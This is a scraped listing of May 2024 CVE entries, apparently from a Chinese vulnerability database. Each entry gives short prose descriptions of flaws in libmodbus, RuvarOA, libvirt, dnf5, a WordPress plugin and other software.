libmodbus v3.1.10 is vulnerable to Buffer Overflow via the modbus_write_bits function. This issue can be triggered when the function is fed with specially crafted input, which leads to out-of-bounds read and can potentially cause a crash or other unintended behaviors. |
详情 |
2b47291691b3018ef30f4a55f391a2fd |
CVE-2024-33382 |
2024-05-08 17:15:07 |
An issue in Open5GS v.2.7.0 allows an attacker to cause a denial of service via the 64 unsuccessful UE/gnb registration |
详情 |
3c5756d567557d61cef29d07c71f0ace |
CVE-2024-25533 |
2024-05-08 17:15:07 |
Error messages in RuvarOA v6.01 and v12.01 were discovered to leak the physical path of the website (/WorkFlow/OfficeFileUpdate.aspx). This vulnerability can allow attackers to write files to the server or execute arbitrary commands via crafted SQL statements. |
详情 |
38bb9387f4ad743a1aa9efe1da567c9e |
CVE-2024-25532 |
2024-05-08 17:15:07 |
RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the bt_id parameter at /include/get_dict.aspx. |
详情 |
6df4f5aa29d70ed58dc25794dddfd731 |
CVE-2024-25528 |
2024-05-08 17:15:07 |
RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the id parameter at /PersonalAffair/worklog_template_show.aspx. |
详情 |
255e484330920e9c437b6c578d3ab3f5 |
CVE-2024-31961 |
2024-05-08 16:15:08 |
A SQL injection vulnerability in unit.php in Sonic Shopfloor.guide before 3.1.3 allows remote attackers to execute arbitrary SQL commands via the level2 parameter. |
详情 |
6ee3299057c4c3af4ef45ddcd2f5f654 |
CVE-2024-28971 |
2024-05-08 16:15:08 |
Dell Update Manager Plugin, versions 1.4.0 through 1.5.0, contains a Plain-text Password Storage Vulnerability in Log file. A remote high privileged attacker could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account. |
详情 |
a4601f68d2ab5c36dab2e9387c9c269f |
CVE-2024-25531 |
2024-05-08 16:15:08 |
RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the PageID parameter at /WebUtility/SearchCondiction.aspx. |
详情 |
8c53135663c216f47554532f107d4859 |
CVE-2024-25530 |
2024-05-08 16:15:08 |
RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the PageID parameter at /WebUtility/get_find_condiction.aspx. |
详情 |
ee4d6349ce5e5820111c2f9faf97110a |
CVE-2024-4418 |
2024-05-08 03:15:07 |
A race condition leading to a stack use-after-free flaw was found in libvirt. Due to a bad assumption in the virNetClientIOEventLoop() method, the `data` pointer to a stack-allocated virNetClientIOEventData structure ended up being used in the virNetClientIOEventFD callback while the data pointer's stack frame was concurrently being "freed" when returning from virNetClientIOEventLoop(). The 'virtproxyd' daemon can be used to trigger requests. If libvirt is configured with fine-grained access control, this issue, in theory, allows a user to escape their otherwise limited access. This flaw allows a local, unprivileged user to access virtproxyd without authenticating. Remote users would need to authenticate before they could access it. |
详情 |
e4aa475ad5c994cbd6aaadbbc024b14b |
CVE-2024-4393 |
2024-05-08 03:15:07 |
The Social Connect plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.2. This is due to insufficient verification on the OpenID server being supplied during the social login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email. |
详情 |
4fa9d1071d1d5f6ae3d0b1278b123840 |
CVE-2024-4162 |
2024-05-08 03:15:06 |
A buffer error in Panasonic KW Watcher versions 1.00 through 2.83 may allow attackers malicious read access to memory. |
详情 |
acb1dd99034b22e19bbceb314bbd00db |
CVE-2024-2860 |
2024-05-08 02:15:09 |
The PostgreSQL implementation in Brocade SANnav versions before 2.3.0a is vulnerable to an incorrect local authentication flaw. An attacker accessing the VM where the Brocade SANnav is installed can gain access to sensitive data inside the PostgreSQL database. |
详情 |
87e8581c949994b12aacc97f24a9d939 |
CVE-2024-2746 |
2024-05-08 02:15:09 |
Incomplete fix for CVE-2024-1929 The problem with CVE-2024-1929 was that the dnf5 D-Bus daemon accepted arbitrary configuration parameters from unprivileged users, which allowed a local root exploit by tricking the daemon into loading a user controlled "plugin". All of this happened before Polkit authentication was even started. The dnf5 library code does not check whether non-root users control the directory in question. On one hand, this poses a Denial-of-Service attack vector by making the daemonoperate on a blocking file (e.g. named FIFO special file) or a very large file that causes an out-of-memory situation (e.g. /dev/zero). On the other hand, this can be used to let the daemon process privileged files like /etc/shadow. The file in question is parsed as an INI file. Error diagnostics resulting from parsing privileged files could cause information leaks, if these diagnostics are accessible to unprivileged users. In the case of libdnf5, no such user accessible diagnostics should exist, though. Also, a local attacker can place a valid repository configuration file in this directory. This configuration file allows to specify a plethora of additional configuration options. This makes various additional code paths in libdnf5 accessible to the attacker. |
详情 |